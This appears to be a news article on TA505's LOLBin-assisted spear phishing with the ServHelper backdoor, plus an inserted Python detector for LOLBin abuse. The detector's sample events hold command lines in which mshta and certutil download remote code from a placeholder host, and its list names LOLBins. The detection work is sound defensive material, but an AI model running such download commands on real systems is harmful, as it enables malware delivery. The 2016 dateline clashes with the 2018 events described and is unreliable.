TA505 Spear Phishing Campaign Uses LOLBins to Avoid Detection

Feb 4, 2016
The TA505 hacking group ran a spear phishing campaign targeting a financial institution during April with the help of a signed version of the ServHelper backdoor and a number of LOLBins designed to help the operation evade detection.
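The article's security-relevant point is that the LOLBins did the work of hiding the operation inside ordinary, signed Windows binaries. The detection logic below is an added example written for this page, not code from the article or from Cybereason; it assumes process-creation telemetry shaped like Sysmon Event ID 1 fields (parent image, image, command line), and its LOLBin list, Office parent list and sample events are illustrative, constructed values rather than a reproduction of the TA505 tooling. It flags a LOLBin only when it is combined with a second signal, such as being spawned by an Office application or carrying a remote URL on its command line, which is how defenders keep such a rule from firing on legitimate use.

```python
"""Detect living-off-the-land binary (LOLBin) abuse in process-creation telemetry.

Added example, not from the original article or from any vendor report it cites.
Assumptions: events are dicts shaped like Sysmon Event ID 1 fields (parent image,
image, command line); the LOLBin list and sample events are illustrative, not a
reproduction of the TA505 tooling.
"""
import re
from typing import Dict, List

# Illustrative subset of Microsoft-signed binaries catalogued by the LOLBAS project.
# Running one of these is normal; the combination with the other signals is not.
LOLBINS = {"mshta.exe", "certutil.exe", "regsvr32.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe", "bitsadmin.exe"}

# Office applications: a LOLBin spawned directly from a document reader is the
# classic spear-phishing execution chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the suspicious indicators found in one process-creation event."""
    reasons: List[str] = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmdline = event.get("cmdline", "")
    if image in LOLBINS:
        reasons.append(f"lolbin:{image}")
        # The remaining indicators only matter once a LOLBin is involved.
        if parent in OFFICE_PARENTS:
            reasons.append(f"office-parent:{parent}")
        if URL_RE.search(cmdline):
            reasons.append("remote-url-in-cmdline")
    return reasons


def find_suspicious(events, min_indicators: int = 2) -> List[dict]:
    """Return events whose indicator count reaches the threshold, annotated with reasons."""
    hits = []
    for event in events:
        reasons = classify_event(event)
        if len(reasons) >= min_indicators:
            hits.append({**event, "reasons": reasons})
    return hits


# Constructed sample events (hypothetical hosts and URLs, not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/doc.hta"},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.invalid/a.txt a.txt"},
    {"parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(basename(hit["image"]), hit["reasons"])
```

On the constructed sample, the two Office-spawned LOLBins with remote URLs are reported and the rundll32 launched by services.exe is not, because a LOLBin name on its own is only one indicator; raise or lower `min_indicators` to tune the rule to an environment's baseline.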

TA505 is a threat group known to have been active since at least Q3 2014 [1, 2] and to have attacked multiple financial institutions and retail companies using large malicious spam campaigns driven by the Necurs botnet, dropping the Dridex and Trick banking Trojans, as well as the Locky and Jaff ransomware strains, on their targets' computers. [1, 2, 3]

During November 2018, as discovered by Proofpoint, TA505 started distributing new malicious tools, the ServHelper backdoor and the FlawedGrace remote access Trojan (RAT), as part of multiple malware campaigns focused on banks, retail businesses, and restaurants.

Persistence based on the environment
Cybereason's security researchers found that TA505's highly targeted phishing attacks made use of "selective persistence mechanism and self kill commands based on autonomous reconnaissance," as well as "deliberate timeline, indicated by the timing of the phishing attack and signing of the malicious code" using a legitimate certificate from Sectigo RSA Code Signing CA.